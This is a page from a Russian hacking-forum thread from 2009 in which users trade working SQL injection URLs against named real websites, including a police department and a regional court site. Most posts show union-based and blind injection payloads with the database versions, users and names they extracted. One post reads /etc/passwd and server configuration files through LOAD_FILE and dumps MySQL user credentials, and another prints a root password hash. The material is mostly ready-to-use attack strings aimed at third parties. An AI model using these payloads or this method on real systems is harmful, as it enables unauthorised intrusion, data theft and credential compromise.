ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 773 из 1242 « Первая < 273673723763 769 770 771 772 773 774 775 776 777 783823873 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7721  
Старый 09.02.2009, 19:27
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию
Код:
http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ ws(0 x3a,version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 4.0.24_Debian
Database name : amazighworld_org
User name : amazighworld_org@localhost
 
Ответить с цитированием

  #7722  
Старый 09.02.2009, 19:58
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
kusa.ca PR5
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*
DBVer:4.1.20
User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!!
DBName:desar01_cms

Работает чтение файлов...
/etc/passwd
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*
/etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов)
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*
Теперь посмотрим что за пользователи...
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума:
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
=)
 
Ответить с цитированием

  #7723  
Старый 09.02.2009, 20:38
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию
Код:
http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),use r()),5,6, 7,8,9,10,11--
Database Version : 5.0.32 - Debian
Database name : emapfm
User name : emapfm@localhost

Код:
http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws( 0x3a,version(),database (),user()),13,14--
Database Version : 5.0.67
Database name : cms_admin
User name : root@localhost

берём админа:

Код:
http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0 x3a,user,password ),13,14+from+my sql.user+limit+0,1--
root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - пасс не расшифровал
 
Ответить с цитированием

  #7724  
Старый 09.02.2009, 21:17
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию
Код:
http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/*
version: 4.0.24_Debian-10sarge2-log
user:adminstr@localhost
database:adminstr
 
Ответить с цитированием

  #7725  
Старый 09.02.2009, 21:30
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
tatsud.ru ВЕРХОВНЫЙ СУД РЕСПУБЛИКИ ТАТАРСТАН=)))

Цитата:
http://tatsud.ru/index.php?link=news.php&month=-3/**/union/**/select/**/1,2,concat_ws(0x3a,Version(),Database(),User()),4+--+
юзер - tatsud@localhost
БД - BDSUD
версия MySQL - 5.0.66a
P.s. дальше копаться совесть не позволила=))
 
Ответить с цитированием

  #7726  
Старый 09.02.2009, 21:42
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) звоним 911 =)
MySQL Ver: 4.1.22
Код:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52  ->  4(ветка)
Я провел до конца брут и выяснил какой же точно версии...
User : apd@localhost
Код:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97   -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112  -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100  -> d
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64   -> @
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108  -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111  -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99   -> c
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97   -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108  -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t
DB : hh_apd
Код:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104  -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104  -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95	  -> _
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97   -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112  -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100  -> d
Еще один клиент... на том же хостинге.. =\
tourismabbotsford.ca - PR5
Уязвимость в:
Код:
http://www.tourismabbotsford.ca/index.php?page_id=291
MySQL Ver: 4.1.22
User : tourism@localhost
DB : hh_tourism
Последний раз редактировалось Kraneg; 09.02.2009 в 22:21..
 
Ответить с цитированием

  #7727  
Старый 09.02.2009, 22:31
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
http://www.tv.myzone.ro/index.php?mid=13[SQL]


Version :5.0.45-log
Database: avatarul_tvmyzone
User: avatarul_razvan@192.168.124.2



blind sql...bruted
 
Ответить с цитированием

  #7728  
Старый 09.02.2009, 22:53
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1) )=102 f

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1) )=116 t

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1) )=101 e

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1) )=64 @

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1) )=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1) )=57 9

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1) )=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1) )=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1) )=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1 ))=54 6

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1 ))=56 8

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1 ))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1 ))=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1 ))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1 ))=51 3

fte@192.168.1.3


***********************


http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 ,1))=53 5

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 ,1))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3 ,1))=48 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4 ,1))=46 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5 ,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6 ,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7 ,1))=45 -

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8 ,1))=68 D

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9 ,1))=101 e

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 0,1))=98 b

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 1,1))=105 i

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 2,1))=97 a

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 3,1))=110 n

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 4,1))=95 _

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 5,1))=48 0

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 6,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 7,1))=98 b

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 8,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 9,1))=110 n

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 0,1))=116 t

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 1,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 2,1))=54 6


5.2122
PS надоело)
 
Ответить с цитированием

  #7729  
Старый 09.02.2009, 23:00
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7--



Database Version: 5.0.75-log
Database name: bmxmagazin_website
User name: bmxmagazin@localhost



всё сложнее найти скули в домене ро, но от этого факта мне еще интересне
 
Ответить с цитированием

  #7730  
Старый 09.02.2009, 23:05
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
Цитата:
Сообщение от Gorev  
всё сложнее найти скули в домене ро, но от этого факта мне еще интересне
вот тебе

Contemporary Romanian Writers
Код:
http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())--
user(): romanian_svc@localhost
database(): romanian_svc 2
version(): 5.0.67-community
 
Ответить с цитированием
Ответ
Страница 773 из 1242 « Первая < 273673723763 769 770 771 772 773 774 775 776 777 783823873 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ